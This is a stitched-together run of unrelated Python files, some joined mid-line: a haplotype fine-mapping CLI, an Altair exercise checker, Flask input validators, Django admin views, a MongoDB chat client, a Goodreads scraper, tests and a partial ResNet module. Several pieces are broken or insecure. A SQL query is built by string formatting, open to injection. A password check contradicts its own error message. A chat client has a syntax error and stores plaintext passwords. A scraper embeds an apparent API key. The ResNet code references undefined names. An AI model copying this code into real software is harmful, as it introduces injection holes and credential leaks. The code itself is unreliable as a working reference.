Tuple from . 
import tree from haptools import data CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"]) @click.group(context_settings=CONTEXT_SETTINGS) @click.version_option() def main(): """ happler: A haplotype-based fine-mapping method Test for associations between a trait and haplotypes (ie sets of correlated SNPs) rather than individual SNPs """ pass @main.command(context_settings=CONTEXT_SETTINGS) @click.argument("genotypes", type=click.Path(exists=True, path_type=Path)) @click.argument("phenotypes", type=click.Path(exists=True, path_type=Path)) @click.option( "--region", type=str, default=None, show_default="all genotypes", help=""" The region from which to extract genotypes; ex: 'chr1:1234-34566' or 'chr7'\n For this to work, the VCF must be indexed and the seqname must match!""", ) @click.option( "-s", "--sample", "samples", type=str, multiple=True, show_default="all samples", help=( "A list of the samples to subset from the genotypes file (ex: '-s sample1 -s" " sample2')" ), ) @click.option( "-S", "--samples-file", type=click.File("r"), show_default="all samples", help=( "A single column txt file containing a list of the samples (one per line) to" " subset from the genotypes file" ), ) @click.option( "-o", "--output", type=click.File("w"), default="-", show_default="stdout", help="A .hap file describing the extracted haplotypes.", ) @click.option( "-v", "--verbosity", type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]), default="ERROR", show_default="only errors", help="The level of verbosity desired", ) def run( genotypes: Path, phenotypes: Path, region: str = None, samples: Tuple[str] = tuple(), samples_file: Path = None, output: TextIO = sys.stdout, verbosity: str = 'CRITICAL', ): """ Use the tool to find trait-associated haplotypes GENOTYPES must be formatted as VCFs and PHENOTYPES must be a tab-separated file containing two columns: sample ID and phenotype value Ex: happler run tests/data/simple.vcf tests/data/simple.tsv > simple.hap \f Parameters ---------- genotypes : Path The path to the genotypes in VCF format phenotypes : Path The path to the phenotypes in TSV format. There should be no header lines. region : str, optional See documentation for :py:meth:`~.data.Genotypes.read` sample : Tuple[str], optional See documentation for :py:meth:`~.data.Genotypes.read` samples_file : Path, optional A single column txt file containing a list of the samples (one per line) to subset from the genotypes file """ log = logging.getLogger("run") logging.basicConfig( format="[%(levelname)8s] %(message)s (%(filename)s:%(lineno)s)", level=verbosity, ) # handle samples if samples and samples_file: raise click.UsageError( "You may only use one of --sample or --samples-file but not both." 
) if samples_file: with samples_file as samps_file: samples = samps_file.read().splitlines() elif samples: # needs to be converted from tuple to list samples = list(samples) else: samples = None # load data log.info("Loading genotypes") gt = data.Genotypes.load(genotypes, region=region, samples=samples) log.info("Loading phenotypes") ph = data.Phenotypes.load(phenotypes, samples=samples) log.info("Running tree builder") hap_tree = tree.TreeBuilder(gt, ph).run() log.info("Outputting haplotypes") tree.Haplotypes.from_tree(hap_tree).write(output) if __name__ == "__main__": # run the CLI if someone tries 'python -m happler' on the command line main(prog_name="happler") import re def test(): # Here we can either check objects created in the solution code, or the # string value of the solution, available as __solution__. A helper for # printing formatted messages is available as __msg__. See the testTemplate # in the meta.json for details. # If an assertion fails, the message will be displayed # Regex expression to capture the line plot variable name without whitespace capture_grp = re.search("[^\s]*(?=\s*=\s*alt.Chart\(stocks\).mark_line)", __solution__) assert capture_grp, "Make sure you assign the line plot to a variable name." # capture_grp.group() holds the variable name of line plot assert capture_grp.group() + ".mark_point" in __solution__, "Make sure you add a layer of another plot object, created from the line plot object with the same encodings but different mark type." # Making sure that the attributes for the line plot object provided in sample code remain unmodified. # Actual plot object is stored in globals() dict. line_plot_object = globals()[capture_grp.group()] # Following test added for a more graceful error message if line_plot_object is not of type Chart. assert type(line_plot_object) == type(alt.Chart()), "Something happened to your line plot. Check to make sure that it is a correct alt.Chart line plot or try renaming the line plot." assert line_plot_object.mark == 'line', f"Make sure you keep {capture_grp.group()} as a line plot using the correct mark type." assert line_plot_object.encoding.x.shorthand == 'date', "Make sure you keep 'date' as the x-axis encoding." assert line_plot_object.encoding.y.shorthand == 'price', "Make sure you keep 'price' as the y-axis encoding." assert line_plot_object.encoding.color.shorthand == 'symbol', "Make sure you keep 'symbol' as the color encoding." __msg__.good("You're correct, well done!") cmagnobarbosa/sara_public-10 """ Default Config File. 
""" # database to mongo DATABASE = 'mestrado' DEFAULT = 'resultados/' sara_files_path = f'{DEFAULT}sara_storage/' centrality_path = f'{DEFAULT}resultados_importancia/' network_path = f'{DEFAULT}redes/' cloud_path = f'{DEFAULT}cloud/' sarabottagger_path = f'{DEFAULT}sarabottagger/' quarentine_path = f'{DEFAULT}sarabot/quarantine/' tf_idf_path = f'{DEFAULT}tf_idf' """ Implement data validations """ import re from flask import jsonify, make_response,abort from validate_email import validate_email from app.api.v2 import database def format_response(status_code, msg, data=list()): """ Method to format responses in a json format :params: status_code, message, data :response: json object """ response = { "status":status_code, "message": msg, "data":data } return make_response(jsonify(response),status_code) def check_duplication(column, table, value): """ Method to check for a value duplication :params: table column, table and variable value Aborts if there is a duplication """ query = """ SELECT {} FROM {} WHERE LOWER({}) = LOWER('{}') """.format(column, table, column, value) duplicated = database.select_from_db(query) if duplicated: abort(make_response(jsonify({ "status":400, "error":"Record already exists in the database"}), 400)) def validate_credentials(self, data): """Validate email, password and role fields""" self.email = data["email"].strip() self.password = data["password"].strip() valid_email = validate_email(self.email) if not valid_email: Message = "Please supply a valid email" abort(400, Message) elif len(self.password) < 6 or len(self.password) > 6: Message = "Password must be long than 6 characters or less than 12" abort(400, Message) elif not any(char.isdigit() for char in self.password): Message = "Password must have a digit" abort(400, Message) elif not any(char.isupper() for char in self.password): Message = "Password must have an upper case character" abort(400, Message) elif not any(char.islower() for char in self.password): Message = "Password must have a lower case character" abort(400, Message) elif not re.search("^.*(?=.*[@#$%^&+=]).*$", self.password): Message = "Password must have a special charater" abort(400, Message) def sanitize_input(input_data): """ Method to sanitize data input :params: user_data Check if it is alphanumeric :response: True, False """ if input_data.isalpha() == False: return False def validate_ints(data): """ Method to validate data of type integer :params: data :response: True, False """ if not isinstance(data, int): return False return True def validate_string(data): """ Method to validate data of type string :params: user input :response: True, False """ if not isinstance(data, str): return False return True def check_field_is_not_empty(input_data): if input_data == "": return False def strip_whitespace(input_data): input_data = input_data.strip() return input_data def check_is_valid_url(url): """check if the url provided is valid""" if re.match(r"https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)", url): return True return False def validate_party_json_keys(request): """ Method to validate request keys :params: request :response: error array """ request_keys = ["name", "hqaddress", "logoUrl"] errors = [] for key in request_keys: if not key in request.json: errors.append(key) return errors def validate_office_json_keys(request): """ Method to validate request keys :params: request :response: error array """ request_keys = ["name","office_type"] errors = [] for key in request_keys: if not key in 
request.json: errors.append(key) return errors def validate_phone_number(phone_number): """ Method to validate phone number :params: phone number :response: boolean """ if len(phone_number) != 10: return False if not phone_number.isdigit(): return False return True def return_error(status_code, message): """ Method to format error message :params: status_code, error message :response: json object """ response = { "status":status_code, "error": message } return make_response(jsonify(response),status_code) def validate_alphabets(user_input): """ Method to validate that a string contains letters only :response:boolean :params: user data, string """ if not user_input.isalpha(): return False return True def validate_office_types(office_type): """ Method to validate office types :params: office type :response: boolean """ office_types = ["local","federal","state", "legistlative"] if office_type not in office_types: return False return True def validate_user_json_keys(request): request_keys = ["firstname", "lastname", "othername","email","phoneNumber","password","passportUrl"] errors = [] for key in request_keys: if not key in request.json: errors.append(key) return errors def check_if_admin_key(request): admin_key = ["isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin"] for key in admin_key: if not key in request.json: return False return True def validate_candidate_json_keys(request): """ Method to validate request keys :params: request :response: error array """ request_keys = ["office","party"] errors = [] for key in request_keys: if not key in request.json: errors.append(key) return errors def sanitize_data(data): errors=[] for item in data: if item == "": errors.append(item) return errors import sys sys.path.append('../../') import constants as cnst import pandas import os root_url = f'{cnst.amt_bucket_base_url}/textured_rendering/' image_dir = f'{cnst.output_root}sample/29/flame_param_association_eval/textured_rendering/' image_names = os.listdir(image_dir) for i, file_name in enumerate(image_names): image_names[i] = root_url + file_name df = pandas.DataFrame(data={"image_url": image_names}) csv_path = f'{cnst.output_root}sample/29/flame_param_association_eval/' df.to_csv(os.path.join(csv_path, "flm_asso_10k.csv"), sep=',', index=False)from django.shortcuts import get_object_or_404, render_to_response from django.shortcuts import render from registration.models import * from events.models import EventNew from django.contrib.auth.models import User from django.contrib.auth.decorators import login_required from django.template import Context from django.core.mail import send_mail, EmailMessage from django.contrib.auth import logout from django.contrib import auth from django.db.models import F # Create your views here. 
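# Note on the views below: `index(request, pagename)` is defined twice; the later
# definition (listing all auth Users) shadows the earlier one (listing UserProfiles
# ordered by college). Likewise the `send_mail` view shadows the imported
# django.core.mail.send_mail helper, so outgoing mail in this module goes through
# EmailMessage instead.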
@login_required def index(request, pagename): u_list = UserProfile.objects.order_by('college')[0:] return render(request, 'pcradmin/'+pagename+'.html', {'u_list':u_list}) @login_required def change_team_limit_list(request): u_list = UserProfile.objects.order_by('college')[0:] return render(request, 'pcradmin/change_team_limit_list.html', {'u_list':u_list}) @login_required def change_team_limits(request): if request.method == 'POST': uid = request.POST.get('uid', False) #fna = request.POST['fna'] #lna = request.POST['lna'] e_list = EventNew.objects.order_by('name')[0:] message = "" return render(request, 'pcradmin/changelimit.html', {'uid':uid, 'e_list':e_list, 'message':message}) @login_required def change_limits(request): if request.method == 'POST': userid = request.POST['userid'] climit = request.POST['limit'] eventid = request.POST['eventid'] p = EventLimits() p.event = EventNew.objects.get(id=int(eventid)) p.leader = UserProfile.objects.get(id=int(userid)) p.limit = climit p.save() return render(request, 'pcradmin/limit_changed.html') @login_required def change_sports_limits(request): a_list = EventNew.objects.order_by('name')[0:] return render(request, 'pcradmin/changesportslimit.html', {'a_list':a_list}) @login_required def save_sports_limits(request): if request.method == 'POST': slimit = request.POST['limit'] eventid = request.POST['eventid'] p = EventNew.objects.get(id=int(eventid)) p.max_limit = slimit p.save() return render(request, 'pcradmin/sportslimitchanged.html') @login_required def index(request, pagename): user_list = User.objects.all() return render(request, 'pcradmin/'+pagename+'.html',{'users' : user_list}) @login_required def set_status(request): if request.method == 'POST': user_name = request.POST['username'] #test1= Participant.objects.filter( gleader__contains = "test") #k= test1.events.all() #p = test1.name #return render(request, 'pcradmin/setstatus.html',{'uname': user_name,'event' : k, 'xname': p }) return render(request, 'pcradmin/setstatus.html',{'uname': user_name}) @login_required def save_status(request): if request.method == 'POST': stat = request.POST['status'] user_name = request.POST['uname'] gauss= User.objects.all() tstat=2 if stat == '0': for obj in gauss: if obj.username == user_name: obj.is_active = False obj.save() if obj.is_active == False: tstat=0 if stat == '1': for obj in gauss: if obj.username == user_name: obj.is_active = True obj.save() if obj.is_active == True: tstat=1 return render(request, 'pcradmin/showstatus.html', {'tstat': tstat}) @login_required def send_mail(request): if request.method == 'POST': sub=request.POST['sub'] body= request.POST['body'] send_to= request.POST['mailadd'] email = EmailMessage(sub, body, '', [send_to]) email.send() return render(request, "pcradmin/sent.html") @login_required def compose(request): if request.method == 'POST': emailadd = request.POST['email'] return render(request, 'pcradmin/compose.html', {'emailadd' : emailadd}) # def pcr_login(request): # context = RequestContext(request) # if request.method == 'POST': # #return render(request, 'pcradmin/changelimit.html') # username = request.POST['username'] # password = request.POST['password'] # user = authenticate(username=username, password=password) # if user: # if user.is_active: # if user.is_staff: # login(request, user) # return HttpResponseRedirect('../dashboard/') # else: # context = {'error_heading' : "Access Denied", 'error_message' : 'You are not a PCr Member.
Return back home'} # return render(request, 'pcradmin/error.html', context) # else: # context = {'error_heading' : "Account Frozen", 'error_message' : 'No changes can be made now
Return back home'} # return render(request, 'pcradmin/error.html', context) # else: # context = {'error_heading' : "Invalid Login Credentials", 'error_message' : 'Please try again'} # return render(request, 'pcradmin/error.html', context) # else: # return render(request, 'pcradmin/login.html')swarm64/py-pg-data-gen import pytest from lib.executor import Executor from lib.table import Table @pytest.fixture def executor(mocker): mocker.patch('lib.schema_parser.Schema') class ExecutorFixture(Executor): def __init__(self): self.tables = { 'a': Table(schema_path='bla/a.sql', scaler=1), 'b': Table(schema_path='bleh/b.sql', scaler=10), 'c': Table(schema_path='bleh/c.sql', scaler=0.1) } self.graph = { 'a': ['c', 'b'], 'b': [], 'c': ['b'], } self.entrypoint = 'a' return ExecutorFixture() def test_generate_sequence(executor): sequence = executor._generate_sequence() assert sequence == ['a', 'c', 'b'] def test_sequence_no_deps(executor): executor.graph = { 'x': [], 'y': [], 'z': [] } executor.entrypoint = ['x', 'y', 'z'] sequence = executor._generate_sequence() assert sequence == ['x', 'y', 'z'] client/src/gochat/apiHelper.py import requests, json import variables, pymongo from pymongo import MongoClient from bson.json_util import dumps from requests.auth import HTTPBasicAuth client = MongoClient("mongodb://localhost:26969/") db = client['gochat'] user = db['user'] messages = db['messages'] user.ensure_index('username',unique=True) def checkUser(username): url = variables.AWSEndPoint + "/checkUser" data = {"username": username} json_data = json.dumps(data) headers = {'Content-type': 'application/json'} response = requests.post(url, data=json_data, headers=headers) return response.text def registerUser(username, password): url = variables.AWSEndPoint + "/registerUser" data = {"username": username, "password": (password)} json_data = json.dumps(data) headers = {'Content-type': 'application/json'} response = requests.post(url, data=json_data, headers=headers) if response.text != "exists": try: db.user.insert_one({'username':username, 'password': )}) except e: print e return response.text def deleteUser(): try: selfUser = db.user.find_one() selfUserName = selfUser['username'] selfPassword = selfUser['password'] requests.get(variables.AWSEndPoint + '/removeUser', auth=(selfUserName, selfPassword)) db.user.drop() return True except: return False def sendMessage(recipient, message): selfUser = db.user.find_one() selfUserName = selfUser['username'] selfPassword = selfUser['password'] if "true" in checkUser(recipient): url = variables.AWSEndPoint + "/newMessage" data = {"to": recipient, "message": message} json_data = json.dumps(data) headers = {'Content-type': 'application/json'} response = requests.post(url, auth=(selfUserName, selfPassword), data=json_data, headers=headers) return response.text else: return "No such user exists!" def unreadMessages(): selfUser = db.user.find_one() selfUserName = selfUser['username'] selfPassword = selfUser['password'] url = variables.AWSEndPoint + "/getNewMessages" response = requests.get(url, auth=(selfUserName, selfPassword)) data = json.loads(response.text) #db.messages.insert(data) return response.text def hash_pass(password): # used to hash the password similar to how MySQL hashes passwords with the password() function. 
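# The two chained SHA-1 digests below reproduce MySQL's legacy (pre-5.7)
# PASSWORD() scheme: '*' + hex(SHA1(SHA1(password))).upper(), so for example
# hash_pass('secret') yields a 41-character string beginning with '*'.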
import hashlib hash_password = hashlib.sha1(password.encode('utf-8')).digest() hash_password = hashlib.sha1(hash_password).hexdigest() hash_password = '*' + hash_password.upper() return hash_password def test(): response = [{"timestamp": 1481886764, "message": "hihhi", "from": "sha"}] print json.dumps(response) #!/usr/bin/env python3 # -*- coding: utf-8 -*- extensions = ['sphinx.ext.autodoc', 'jaraco.packaging.sphinx', 'rst.linker'] master_doc = "index" # Custom sidebar templates, maps document names to template names. html_theme = 'alabaster' templates_path = ['_templates'] html_sidebars = {'index': ['tidelift-sidebar.html']} link_files = { '../CHANGES.rst': dict( using=dict(GH='https://github.com'), replace=[ dict( pattern=r'(Issue #|\B#)(?P\d+)', url='{package_url}/issues/{issue}', ), dict( pattern=r'(?m:^((?Pv?\d+(\.\d+){1,2}))\n[-=]+\n)', with_scm='{text}\n{rev[timestamp]:%d %b %Y}\n', ), dict( pattern=r'PEP[- ](?P\d+)', url='https://www.python.org/dev/peps/pep-{pep_number:0>4}/', ), dict( pattern=r'Python #(?P\d+)', url='https://bugs.python.org/issue{python}', ), ], ) } import urllib2 import csv import time import sys import xml.etree.ElementTree as ET import os def getval(root, element): try: ret = root.find(element).text if ret is None: return "" else: return ret.encode("utf8") except: return "" with open('csv_files/user_data.csv', 'w') as csvfile, open('csv_files/book_data.csv', 'w') as csvfile_book, open('csv_files/book_author.csv', 'w') as csvfile_author: fieldnames = ['id', 'name','user_name', 'profile_url','image_url', 'about', 'age', 'gender', 'location','joined','last_active' ] writer = csv.DictWriter(csvfile, delimiter = ',', lineterminator = '\n', fieldnames=fieldnames) writer.writeheader() book_fieldnames = [ 'user_id', 'b_id', 'shelf', 'isbn', 'isbn13', 'text_reviews_count', 'title', 'image_url', 'link', 'num_pages', 'b_format', 'publisher', 'publication_day', 'publication_year', 'publication_month', 'average_rating', 'ratings_count', 'description', 'published' ] writer_book = csv.DictWriter(csvfile_book, delimiter = ',', lineterminator = '\n', fieldnames=book_fieldnames) writer_book.writeheader() author_fieldnames = [ 'u_id', 'b_id', 'a_id', 'name', 'average_rating', 'ratings_count', 'text_reviews_count'] writer_author = csv.DictWriter(csvfile_author, delimiter = ',', lineterminator = '\n', fieldnames = author_fieldnames) writer_author.writeheader() for i in range(1,50000): try: time.sleep(1) url = 'https://www.goodreads.com/user/show/'+ str(i) +'.xml?key=' response = urllib2.urlopen(url) user_data_xml = response.read() # write xml to file f = open("xml_docs/user"+ str(i) +".xml", "w") try: f.write(user_data_xml) finally: f.close() #root = ET.fromstring() root = ET.parse("xml_docs/user"+ str(i) +".xml").getroot() os.remove("xml_docs/user"+ str(i) +".xml") user_element = root.find('user') id = getval(user_element,'id') name = getval(user_element,'name') user_name = getval(user_element,'user_name') profile_url = getval(user_element,'link') image_url = getval(user_element,'image_url') about = getval(user_element,'about') age = getval(user_element,'age') gender = getval(user_element,'gender') location = getval(user_element,'location') joined = getval(user_element,'joined') last_active = getval(user_element,'last_active') writer.writerow({'id': id, 'name' : name,'user_name' : user_name, 'profile_url' : profile_url,'image_url' : image_url, 'about' : about, 'age': age, 'gender' : gender, 'location' : location, 'joined' : joined, 'last_active': last_active}) # get list of user 
shelves user_shelves_root = user_element.find('user_shelves') user_shelf_list = [] for user_shelf in user_shelves_root.findall("user_shelf"): shelf = getval(user_shelf,"name") #Books on Shelf shelf_url = "https://www.goodreads.com/review/list/"+ str(i) +".xml?key=i3Zsl7r13oHEQCjv1vXw&v=2&shelf=" + shelf time.sleep(1) response = urllib2.urlopen(shelf_url) shelf_data_xml = response.read() # write xml to file f = open("xml_docs/user_shelf_" + shelf + "_"+ str(i) + ".xml", "w") try: f.write(shelf_data_xml) finally: f.close() shelf_root = ET.parse("xml_docs/user_shelf_" + shelf + "_"+ str(i) + ".xml").getroot() os.remove("xml_docs/user_shelf_" + shelf + "_"+ str(i) + ".xml") reviews = shelf_root.find("reviews") for review in reviews.findall("review"): for book in review.findall("book"): b_id = getval(book,"id") isbn = getval(book,"isbn") isbn13 = getval(book,"isbn13") text_reviews_count = getval(book,"text_reviews_count") title = getval(book,"title") image_url = getval(book,"image_url") link = getval(book,"link") num_pages = getval(book,"num_pages") b_format = getval(book,"format") publisher = getval(book,"publisher") publication_day = getval(book,"publication_day") publication_year = getval(book, "publication_year") publication_month = getval(book,"publication_month") average_rating = getval(book,"average_rating") ratings_count = getval(book,"rating_count") description = getval(book,"description") published = getval(book,"published") writer_book.writerow({ 'user_id': id, 'b_id' : b_id , 'shelf' : shelf, 'isbn' : isbn, 'isbn13': isbn13, 'text_reviews_count' : text_reviews_count, 'title' : title, 'image_url' : image_url, 'link' : link, 'num_pages' : num_pages, 'b_format' : b_format, 'publisher' : publisher, 'publication_day' : publication_day, 'publication_year' : publication_year, 'publication_month' : publication_month, 'average_rating' : average_rating, 'ratings_count' : ratings_count, 'description' : description }) authors = book.find("authors") for author in authors.findall("author"): a_id = getval(author,"id") name = getval(author,"name") average_rating = getval(author,"average_rating") ratings_count = getval(author,"ratings_count") text_reviews_count = getval(author,"text_reviews_count") writer_author.writerow({'u_id': id, 'b_id' : b_id, 'a_id' : a_id, 'name' : name, 'average_rating' : average_rating, 'ratings_count' : ratings_count, 'text_reviews_count' : text_reviews_count}) except: time.sleep(1)from typing import Optional def ensure_sim_type_string(value: Optional[str]) -> Optional[str]: if value is None or len(value) == 0 or value[0].isupper(): return value return value[0].upper() + value[1:] import numpy from PIL import Image, ImageDraw import cv2 polygon = [(1,1),(100,20),(120, 130), (12, 120)] width = 299 height = 299 img = Image.new('L', (width, height), 0) ImageDraw.Draw(img).polygon(polygon, outline=1, fill=1) mask = numpy.array(img) print(mask) cv2.imshow("mask", mask * 255) cv2.waitKey(0) import requests import sys import time import os _MAX_SECONDS_ALLOWED_FOR_TESTS = 900 def main(): trigger_url = sys.argv[1] trigger_resp = requests.get(trigger_url) if trigger_resp.ok: trigger_json = trigger_resp.json().get("data", {}) test_runs = trigger_json.get("runs", []) print("Started {} test runs.".format(len(test_runs))) results = {} deadline = time.time() + _MAX_SECONDS_ALLOWED_FOR_TESTS while len(results) < len(test_runs): if time.time() >= deadline: print('Some test runs did not complete in the allowed window of %s seconds' % _MAX_SECONDS_ALLOWED_FOR_TESTS) exit(1) time.sleep(1) 
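# Poll every started run roughly once per second; a run is recorded only when the
# Runscope API reports a terminal result ("pass" or "fail"), while a "working"
# response leaves it pending for the next pass through the loop. The enclosing
# while-loop exits once every test_run_id has a result, or aborts when the
# _MAX_SECONDS_ALLOWED_FOR_TESTS deadline is reached.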
for run in test_runs: test_run_id = run.get("test_run_id") if test_run_id not in results: result_data = _get_result(run) if not result_data: continue result = result_data.get("result") if result in ["pass", "fail"]: results[test_run_id] = result_data elif result == "working": # Results aren't ready yet. Will retry the next # time through the loop. pass else: print("Got response with unknown result field. Full response was %s" % result_data) pass_count = sum([r.get("result") == "pass" for r in list(results.values())]) fail_count = sum([r.get("result") == "fail" for r in list(results.values())]) if fail_count > 0: print("{} test runs passed. {} test runs failed.".format(pass_count, fail_count)) exit(1) print("All test runs passed.") def _get_result(test_run): # generate Personal Access Token at https://www.runscope.com/applications if "RUNSCOPE_ACCESS_TOKEN" not in os.environ: print("Please set the environment variable RUNSCOPE_ACCESS_TOKEN. You can get an access token by going to https://www.runscope.com/applications") exit(1) API_TOKEN = os.environ["RUNSCOPE_ACCESS_TOKEN"] opts = { "base_url": "https://api.runscope.com", "bucket_key": test_run.get("bucket_key"), "test_id": test_run.get("test_id"), "test_run_id": test_run.get("test_run_id") } result_url = "{base_url}/buckets/{bucket_key}/tests/{test_id}/results/{test_run_id}".format(**opts) print("Getting result: {}".format(result_url)) headers = { "Authorization": "Bearer {}".format(API_TOKEN), "User-Agent": "python-trigger-sample" } result_resp = requests.get(result_url, headers=headers) if result_resp.status_code == 404: print('Unable to find test run result at %s' % result_url) return if result_resp.ok: data = result_resp.json().get("data") if not data: print("Response data was empty. Full response was %s" % result_resp.text) return data # States Title, recently experenced a false positive. This should provide some # more information in the event of another failure print( "Result response not ok... Check Runscope for more information: " "https://www.runscope.com/radar/{bucket_key}/{test_id}/history/{test_run_id}" .format(**opts) ) print("\n\nResponse: {}".format(result_resp.text)) # Currently unrecoverable, TODO: revisit if false positive presist exit(1) if __name__ == '__main__': main() import sys import os import logging class Utils(object): """ Utility functions. """ @staticmethod def log_to_stdout(level=logging.INFO): """ Sets up logging to stdout at the (optional) level specified. """ root = logging.getLogger() root.setLevel(level) handler = logging.StreamHandler(sys.stdout) handler.setLevel(level) formatter = logging.Formatter('%(asctime)s: %(levelname)s - %(message)s') handler.setFormatter(formatter) root.addHandler(handler) @staticmethod def path_relative_to_module(module_file_path, filename): """ Returns a path for filename in the same folder as the module_file_path. When calling this, you will usually pass __file__ as the module_file_path parameter. 
""" return os.path.join(os.path.dirname(module_file_path), filename)0 from unittest import TestCase from kiwi.ContentEngine import ContentEngine import pandas as pd from kiwi.TransferTypes import Vote class ContentEngineTest(TestCase): def setUp(self): self.empty_content_frame = pd.DataFrame([], columns=['ItemId', 'Tags']) self.empty_ratings_frame = pd.DataFrame( [], columns=['UserId', 'ItemId', 'Like']) self.full_content_frame = pd.DataFrame.from_records( [('i1', 'Action|Comedy'), ('i2', 'Action|Adventure')], columns=['ItemId', 'Tags']) self.full_rating_frame = pd.DataFrame.from_records( [('u1', 'i1', 1), ('u2', 'i1', -1)], columns=['UserId', 'ItemId', 'Like']) def test_empty_setup_does_not_train(self): engine = ContentEngine( self.empty_content_frame, self.empty_ratings_frame) with self.assertRaises(ValueError): engine.fit() self.assertIsNone(engine.tf_vectors) self.assertIsNone(engine.user_vectors) def test_empty_setup_with_content(self): engine = ContentEngine( self.full_content_frame, self.empty_ratings_frame) engine.fit() self.assertFalse(engine.tf_vectors.empty) self.assertTrue(engine.user_vectors.empty) columns = engine.user_vectors.columns index = engine.user_vectors.index self.assertTrue(all(columns.contains(x) for x in [0, 1, 2])) self.assertTrue(index.empty) def test_empty_initial_ratings_rating_added(self): engine = ContentEngine( self.full_content_frame, self.empty_ratings_frame) engine.fit() engine.update_ratings(Vote(user='u1', post='1', vote=1)) engine.build_user_taste_vector('u1', insert=True) self.assertEqual(engine.user_vectors.shape, (1, 3)) def test_existing_taste_vector_does_not_change_without_update(self): engine = ContentEngine( self.full_content_frame, self.full_rating_frame) engine.fit() # engine.update_ratings(('u1', 'i2', 1)) vector1 = engine.user_vectors.loc['u1'] vector2 = engine.build_user_taste_vector('u1') self.assertEqual(vector1.tolist(), vector2.tolist()) def test_update_existing_taste_vector(self): engine = ContentEngine( self.full_content_frame, self.full_rating_frame) engine.fit() engine.update_ratings(('u1', 'i2', 1)) vector1 = engine.user_vectors.loc['u1'].tolist() vector2 = engine.build_user_taste_vector('u1', insert=True) inserted = engine.user_vectors.loc['u1'] self.assertNotEqual(vector1, vector2.tolist()) self.assertEqual(vector2.tolist(), inserted.tolist()) def test_get_nonexisting_user_vector_raises(self): engine = ContentEngine( self.full_content_frame, self.full_rating_frame) engine.fit() with self.assertRaises(KeyError): engine.user_vectors.loc['u3']import math import torch import torch.nn as nn class IBN(nn.Module): def __init__(self, planes): super(IBN, self).__init__() half1 = int(planes/2) self.half = half1 half2 = planes - half1 self.IN = nn.InstanceNorm2d(half1, affine=True) self.BN = nn.BatchNorm2d(half2) def forward(self, x): split = torch.split(x, self.half, 1) out1 = self.IN(split[0].contiguous()) out2 = self.BN(split[1].contiguous()) out = torch.cat((out1, out2), 1) return out ibns = { 'none': nn.BatchNorm2d, 'a': IBN, 'b': nn.BatchNorm2d, 'ab':IBN, 's': SwitchNorm2d } class Bottleneck(nn.Module): expansion = 4 def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, ibn_mode='none'): super(Bottleneck, self).__init__() self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False) # self.bn1 = nn.BatchNorm2d(planes) self.bn1 = ibns[ibn_mode](planes) self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, dilation=dilation, padding=dilation, bias=False) self.bn2 = nn.BatchNorm2d(planes) 
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False) self.bn3 = nn.BatchNorm2d(planes * 4) self.IN = None if ibn_mode == 'b' or ibn_mode == 'ab': self.IN = nn.InstanceNorm2d(planes * 4, affine=True) self.relu = nn.ReLU(inplace=True) self.downsample = downsample self.stride = stride self.dilation = dilation def forward(self, x): residual = x out = self.conv1(x) out = self.bn1(out) out = self.relu(out) out = self.conv2(out) out = self.bn2(out) out = self.relu(out) out = self.conv3(out) out = self.bn3(out) if self.downsample is not None: residual = self.downsample(x) out += residual if self.IN is not None: out = self.IN(out) out = self.relu(out) if TRACK_FEAT: SHARED_LIST.append(out) return out class ResNet(nn.Module): def __init__(self, block, layers, output_stride, ibn_mode='none',renet = 'resnet101'): self.inplanes = 64 super(ResNet, self).__init__() blocks = [1, 2, 4] if output_stride == 32: strides = [1, 2, 2, 2] dilations = [1, 1, 1, 2] elif output_stride == 16: strides = [1, 2, 2, 1] dilations = [1, 1, 1, 2] elif output_stride == 8: strides = [1, 2, 1, 1] dilations = [1, 1, 2, 4] else: raise NotImplementedError # Modules self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False) if ibn_mode == 'b': self.bn1 = nn.InstanceNorm2d(64, affine=True) else: self.bn1 = nn.BatchNorm2d(64) self.relu = nn.ReLU(inplace=True) self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) self.layer1 = self._make_layer(block, 64, layers[0], stride=strides[0], dilation=dilations[0], ibn_mode=ibn_mode) self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], dilation=dilations[1], ibn_mode=ibn_mode) self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], dilation=dilations[2], ibn_mode=ibn_mode) self.layer4 = self._make_MG_unit(block, 512, blocks=blocks, stride=strides[3], dilation=dilations[3], ibn_mode=ibn_mode) for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. 
/ n)) elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() def _make_layer(self, block, planes, blocks, stride=1, dilation=1, ibn_mode='none'): downsample = None if stride != 1 or self.inplanes != planes * block.expansion: downsample = nn.Sequential( nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(planes * block.expansion), ) layers = [] layers.append(block(self.inplanes, planes, stride, dilation, downsample, ibn_mode)) self.inplanes = planes * block.expansion for i in range(1, blocks): layers.append(block(self.inplanes, planes, dilation=dilation, ibn_mode=ibn_mode)) return nn.Sequential(*layers) def _make_MG_unit(self, block, planes, blocks, stride=1, dilation=1, ibn_mode='none'): downsample = None if stride != 1 or self.inplanes != planes * block.expansion: downsample = nn.Sequential( nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(planes * block.expansion), ) layers = [] if planes == 512: ibn_mode = 'none' layers.append(block(self.inplanes, planes, stride, dilation=blocks[0]*dilation, downsample=downsample, ibn_mode=ibn_mode)) self.inplanes = planes * block.expansion for i in range(1, len(blocks)): layers.append(block(self.inplanes, planes, stride=1, dilation=blocks[i]*dilation, ibn_mode=ibn_mode)) return nn.Sequential(*layers) def forward(self, input): low_level_feats = [] if TRACK_FEAT: SHARED_LIST.clear() x = self.conv1(input) x = self.bn1(x) 